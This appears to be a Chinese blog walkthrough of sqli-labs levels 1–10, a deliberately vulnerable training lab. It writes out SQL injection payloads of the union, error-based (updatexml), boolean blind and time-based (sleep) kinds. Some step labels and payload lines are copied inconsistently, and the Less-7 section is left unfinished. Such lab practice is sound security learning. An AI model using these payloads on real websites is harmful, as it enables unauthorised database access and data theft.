当前位置: 首页 > news >正文

sqli --【1--10】

Less-1(联合查询)

1.查看是否有回显

2.查看是否有报错

3.使用联合查询(字符注入)

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-2(联合查询)

1.查看是否有回显

2.查看是否有报错

3.使用联合查询(数字型注入)

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-3(联合查询)

1.查看是否有回显

2.查看是否有报错

3.使用联合查询(数字型注入)

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-4(联合查询)

1.查看是否有回显

2.查看是否有报错

3.使用联合查询(数字型注入)

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-5(错误注入)

1.无显示

2.有错误

3.使用错误注入

Less-6(错误注入)

1.无显示

2.有错误

3.使用错误注入

Less-7(读写文件)

1.查看是否有回显

Less-8(布尔盲注)

1.没有回显

2.没有报错

3.布尔盲注获取数据库名

4.计算数据库名字的位数

5.猜测每一位

Less-9(延时注入--1‘)

1.没有回显

2.没有报错

3.使用延时注入

4.分别查看每一位

Less-10(延时注入--1“)

1.没有回显

2.没有报错

3.使用延时注入

4.分别查看每一位


Less-1(联合查询)

1.查看是否有回显

?id=1

image-20230823212812230

2.查看是否有报错

?id=2'

image-20230823212916505

3.使用联合查询(字符注入)

3.1判断其列数

?2' order by 4 --+
判断有3列

image-20230823213657350

3.2 判断显示位置

?id=2' and 1=2 union select 1,2,3 --+
此处为字符型注入,要确定前一段为假

image-20230823214024670

3.3敏感信息查询

?id=2' and 1=2 union select 1,version(),database() --+
​
version() --版本号  :5.7.26
database()--数据库名称 : security

image-20230823214321828

Less-2(联合查询)

1.查看是否有回显

?id=1

image-20230823221044476

2.查看是否有报错

?id=2'

image-20230823221201775

3.使用联合查询(数字型注入)

3.1判断其列数

?2' order by 4 --+
判断有3列

image-20230823221627126

3.2 判断显示位置

?id=2' and 1=2 union select 1,2,3 --+
此处为字符型注入,要确定前一段为假

image-20230823221652336

3.3敏感信息查询

?id=2' and 1=2 union select 1,version(),database() --+
​
version() --版本号  :5.7.26
database()--数据库名称 : security

image-20230823221720787

Less-3(联合查询)

1.查看是否有回显

?id=1

image-20230823222047496

2.查看是否有报错

?id=2'

image-20230823222133486

3.使用联合查询(数字型注入)

3.1判断其列数

?2') order by 4 --+
判断有3列

image-20230823222242959

3.2 判断显示位置

?id=2') and 1=2 union select 1,2,3 --+
此处为字符型注入,要确定前一段为假

image-20230823222316251

3.3敏感信息查询

?id=2') and 1=2 union select 1,version(),database() --+
​
version() --版本号  :5.7.26
database()--数据库名称 : security

image-20230823222352407

Less-4(联合查询)

1.查看是否有回显

?id=1

image-20230823222504478

2.查看是否有报错

?id=2"

image-20230823222756754

3.使用联合查询(数字型注入)

3.1判断其列数

?2") order by 4 --+
判断有3列

image-20230823222852599

3.2 判断显示位置

?id=2") and 1=2 union select 1,2,3 --+
此处为字符型注入,要确定前一段为假

image-20230823222939729

3.3敏感信息查询

?id=2") and 1=2 union select 1,version(),database() --+
​
version() --版本号  :5.7.26
database()--数据库名称 : security

image-20230823223015613

Less-5(错误注入)

1.无显示

image-20230823223422750

2.有错误

image-20230823223533204

3.使用错误注入

?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+

image-20230823223952605

Less-6(错误注入)

1.无显示

image-20230823224143187

2.有错误

image-20230823224249541

3.使用错误注入

?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+

image-20230823224334113

Less-7(读写文件)

1.查看是否有回显

根据 Use outfile判断,此处使用写入文件的方式

image-20230824204519878

2.

Less-8(布尔盲注)

1.没有回显

image-20230823215743763

2.没有报错

image-20230823215938620

3.布尔盲注获取数据库名

?id=2' and database()='ajest' --+
没有显示,成本太高

image-20230823220022235

4.计算数据库名字的位数

?id=2' and length(database())>0 --+
?id=2' and length(database())=8 --+
​
显示八位
​

descript

descript

5.猜测每一位

?id=2' and ascii(substr((select database()),1,1))=115 --+

115 s

101 e

99 c

117 u

114 r

105 i

116 t

121 y

数据库:security

descript

Less-9(延时注入--1‘)

1.没有回显

?id=1

descript

2.没有报错

?id=1'

descript

3.使用延时注入

?id=1' and if(length((select version()))=6,sleep(5),1) --+
​
版本号共有6位

descript

4.分别查看每一位

?id=1' and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+

53 5

46 .

55 7

46 .

50 2

54 6

版本号 :5.7.26

descript

descript

descript

descript

descript

descript

Less-10(延时注入--1“)

1.没有回显

?id=1

image-20230824223349191

2.没有报错

?id=1"

image-20230824223316986

3.使用延时注入

?id=1" and if(length((select version()))=6,sleep(5),1) --+
​
版本号共有6位

image-20230824223246293

4.分别查看每一位

?id=1" and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+

53 5

46 .

55 7

46 .

50 2

54 6

版本号 :5.7.26

image-20230824223201619

相关文章:

sqli --【1--10】

Less-1(联合查询) 1.查看是否有回显 2.查看是否有报错 3.使用联合查询(字符注入) 3.1判断其列数 3.2 判断显示位置 3.3敏感信息查询 Less-2(联合查询) 1.查看是否有回显 2.查看是否有报错 3.使用…...

《自然语言处理(NLP)的最新进展:Transformers与GPT-4的浅析》

🌷🍁 博主猫头虎(🐅🐾)带您 Go to New World✨🍁 🦄 博客首页——🐅🐾猫头虎的博客🎐 🐳 《面试题大全专栏》 🦕 文章图文…...

Wireshark 用命令行分析数据包

1,那些情况需要使用命令行 Wireshark一次性提供了太多的信息。使用命令行工具可以限制打印出的信息,最后只显示相关数据,比如用单独一行来显示IP地址。命令行工具适用于过滤数据包捕获文件,并提供结果给另一个支持UNIX管道的工具…...

LVS DR模式负载均衡群集部署

目录 1 LVS-DR 模式的特点 1.1 数据包流向分析 1.2 DR 模式的特点 2 DR模式 LVS负载均衡群集部署 2.1 配置负载调度器 2.1.1 配置虚拟 IP 地址 2.1.2 调整 proc 响应参数 2.1.3 配置负载分配策略 2.2 部署共享存储 2.3 配置节点服务器 2.3.1 配置虚拟 IP 地址 2.3.2…...

探讨前后端分离开发的优势、实践以及如何实现更好的用户体验?

随着互联网技术的迅猛发展,前后端分离开发已经成为现代软件开发的一种重要趋势。这种开发模式将前端和后端的开发工作分开,通过清晰的接口协议进行通信,旨在优化开发流程、提升团队协作效率,并最终改善用户体验。本文将深入探讨前…...

微博一面:JVM预热,你的方案是啥?

说在前面 在40岁老架构师 尼恩的读者社区(50)中,最近有小伙伴拿到了一线互联网企业如微博、阿里、汽车之家、极兔、有赞、希音、百度、网易、滴滴的面试资格,遇到一几个很重要的面试题: JVM预热,你的方案是啥?Springb…...

open与fopen的区别

1. 来源 从来源的角度看,两者能很好的区分开,这也是两者最显而易见的区别: open是UNIX系统调用函数(包括LINUX等),返回的是文件描述符(File Descriptor),它是文件在文件…...

Unity记录一些glsl和hlsl的着色器Shader逆向代码

以下内容一般基于 GLSL 300 之后 以下某些代码行,是“伪代码“,绝大部分是renderDoc 逆向产生标准代码 本人OpenlGL零基础,也不打算重头学 目录 Clip() 剔除函数 discard; FS最终颜色输出 out 和最终颜色相加方程…...

基于Sentinel的微服务保护

前言 Sentinel是Alibaba开源的一款微服务流控组件,用于解决分布式应用场景下服务的稳定性问题。Sentinel具有丰富的应用场景,它基于流量提供一系列的服务保护措施,例如多线程秒杀情况下的系统承载,并发访问下的流量控制&#xff…...

Collectors类作用:

一、Collectors类: 1.1、Collectors介绍 Collectors类,是JDK1.8开始提供的一个的工具类,它专门用于对Stream操作流中的元素各种处理操作,Collectors类中提供了一些常用的方法,例如:toList()、toSet()、to…...

LASSO回归

LASSO回归 LASSO(Least Absolute Shrinkage and Selection Operator,最小绝对值收敛和选择算子算法)是一种回归分析技术,用于变量选择和正则化。它由Robert Tibshirani于1996年提出,作为传统最小二乘回归方法的替代品。 损失函数 1.线性回…...

机器学习中的 K-均值聚类算法及其优缺点。

K-均值聚类算法是一种常见的无监督学习算法,它可以将数据集分成 K 个簇,每个簇内部的数据点尽可能相似,而不同簇之间的数据点应尽可能不同。下面详细讲解 K-均值聚类算法的优缺点: 优点: 简单易用:K-均值…...

云计算与虚拟化

一、概念 什么是云计算? 云计算(cloud computing)是分布式计算的一种,指的是通过网络“云”将巨大的数据计算处理程序分解成无数个小程序,然后,通过多部服务器组成的系统进行处理和分析这些小程序得到结果…...

Linux常见进程类别

目录 常见进程类别 守护进程&精灵进程 任务管理 进程组 作业 作业 | 进程组 会话 w命令 守护进程 守护进程的创建 setsid()函数 daemon()函数 模拟实现daemon函数 前台进程 | 后台进程 僵尸进程 | 孤儿进程 僵尸进程的一些细节 守护进程 | 后台进程 守护…...

智能小车之蓝牙控制并测速小车、wife控制小车、4g控制小车、语音控制小车

目录 1. 蓝牙控制小车 2. 蓝牙控制并测速小车 3. wifi控制测速小车 4. 4g控制小车 5. 语音控制小车 1. 蓝牙控制小车 使用蓝牙模块,串口透传蓝牙模块,又叫做蓝牙串口模块 串口透传技术: 透传即透明传送,是指在数据的传输过…...

指针进阶(一)

指针进阶 1. 字符指针面试题 2. 指针数组3. 数组指针3.1 数组指针的定义3.2 &数组名VS数组名 3.3 数组指针的使用4. 数组传参和指针传参4.1 一维数组传参4.2 二维数组传参4.3 一级指针传参4.4 二级指针传参 前言 指针的主题,我们在初级阶段的《指针》章节已经接…...

c# sql 判断表中是否包含指定字段

你可以使用以下方法来判断一个 SQL 数据库中的表是否包含指定的字段。 首先,你需要连接到数据库,然后执行一条 SQL 查询语句来检查表结构。你可以使用 SELECT 语句和 INFORMATION_SCHEMA.COLUMNS 系统视图来获取表中的所有列信息。 下面是一个示例代码…...

08-JVM垃圾收集器详解

上一篇:07-垃圾收集算法详解 如果说收集算法是内存回收的方法论,那么垃圾收集器就是内存回收的具体实现。 虽然我们对各个收集器进行比较,但并非为了挑选出一个最好的收集器。因为直到现在为止还没有最好的垃圾收集器出现,更加没…...

sql_mode详解

文章目录 一、sql_mode作用二、查询sql_mode三、mysql8默认的mode配置(6个默认配置)四、常见mode详细解释mysql8默认配置了的mode(6个)需要自己配置的mode(4个) 五、设置sql_mode(一旦设置了&am…...

Vue3的新特性总结

一、Vue3 里 script 的三种写法 首先&#xff0c;Vue3 新增了一个叫做组合式 api 的东西&#xff0c;英文名叫 Composition API。因此 Vue3 的 script 现在支持三种写法。 1、最基本的 Vue2 写法 <template><div>{{ count }}</div><button click"…...

BookGet:一键下载全球50+图书馆古籍资源的智能工具指南

BookGet&#xff1a;一键下载全球50图书馆古籍资源的智能工具指南 【免费下载链接】bookget bookget 数字古籍图书下载工具。 项目地址: https://gitcode.com/gh_mirrors/bo/bookget 你是否曾为查找古籍资料而奔波于各大数字图书馆&#xff1f;是否因为复杂的下载流程而…...

实测:2026 年国内直连 AI 一站式平台,聊天 / 绘画 / 论文 / 视频全搞定,不用翻墙不花冤枉钱

最近 AI 圈真的太卷了。ChatGPT 5.4、Gemini 3.1、Claude Code 轮番上新&#xff0c;多模态、长文本、代码 Auto Mode 一个比一个强。但普通用户想用明白&#xff0c;真的太折腾。先说说我踩过的三大坑&#xff0c;句句大实话网络糟心到崩溃官网打不开、地区不可用、加载转圈、…...

综述篇 | 2015-2024,情绪识别(Emotion Recognition)技术演进与核心论文全景解读

1. 情绪识别技术演进全景图&#xff08;2015-2024&#xff09; 十年前&#xff0c;当研究人员试图通过摄像头分析人脸肌肉变化来判断情绪时&#xff0c;准确率还停留在60%左右。如今&#xff0c;结合多模态数据的情绪识别系统在特定场景下已突破90%准确率。这九年间的技术跃迁可…...

Claude API代理网关:开源项目newaiproxy/claude-api架构解析与部署实战

1. 项目概述&#xff1a;一个连接Claude的API代理网关如果你正在尝试将Claude的对话能力集成到自己的应用里&#xff0c;或者想绕过官方Web界面的一些限制&#xff0c;那么你很可能已经听说过或者正在寻找一个可靠的API代理方案。newaiproxy/claude-api这个项目&#xff0c;本质…...

iOSDeviceSupport终极指南:如何快速解决Xcode设备支持文件缺失问题

iOSDeviceSupport终极指南&#xff1a;如何快速解决Xcode设备支持文件缺失问题 【免费下载链接】iOSDeviceSupport All versions of iOS Device Support 项目地址: https://gitcode.com/gh_mirrors/ios/iOSDeviceSupport 你是否曾经在iOS开发中遇到过这样的困扰&#xf…...

中国行政区划数据生成器:开发者的地理数据基础设施解决方案

中国行政区划数据生成器&#xff1a;开发者的地理数据基础设施解决方案 【免费下载链接】chinese-address-generator 中国地址生成器 - 三级地址 四级地址 随机生成完整地址 项目地址: https://gitcode.com/gh_mirrors/ch/chinese-address-generator 在现代软件开发过程…...

如何5步将小爱音箱改造成专属AI语音助手:MiGPT终极指南

如何5步将小爱音箱改造成专属AI语音助手&#xff1a;MiGPT终极指南 【免费下载链接】mi-gpt &#x1f3e0; 将小爱音箱接入 ChatGPT 和豆包&#xff0c;改造成你的专属语音助手。 项目地址: https://gitcode.com/GitHub_Trending/mi/mi-gpt 你是否曾想过让小爱音箱摆脱&…...

OpenSpeedy:终极免费游戏变速工具完整使用指南

OpenSpeedy&#xff1a;终极免费游戏变速工具完整使用指南 【免费下载链接】OpenSpeedy &#x1f3ae; An open-source game speed modifier. 项目地址: https://gitcode.com/gh_mirrors/op/OpenSpeedy OpenSpeedy是一款完全免费且开源的Windows游戏加速工具&#xff0c…...

EDA工具链互操作性:从概念到实践,破解芯片设计数据孤岛

1. 互操作性&#xff1a;一个被误解的工程圣杯 在半导体和电子设计自动化&#xff08;EDA&#xff09;这个行当里干了十几年&#xff0c;我听到“互操作性”这个词的频率&#xff0c;可能比听到“摩尔定律”还要高。每次行业巨头们坐下来&#xff0c;宣布要共同制定一个新标准时…...

GP8892SEH贴片SOP7省外围5V2A隔离型原边反馈芯片直接替代MT3723

GP8892SEH 是一款自供电原边反馈 PWM 控制芯片&#xff0c;采用 SOP7 贴片封装&#xff0c;主打"省外围、高精度、低待机"路线。它内置功率三极管&#xff0c;无需外置功率管&#xff0c;同时集成了 FB 下偏电阻和 CS 采样电阻&#xff0c;外围元件极少&#xff0c;特…...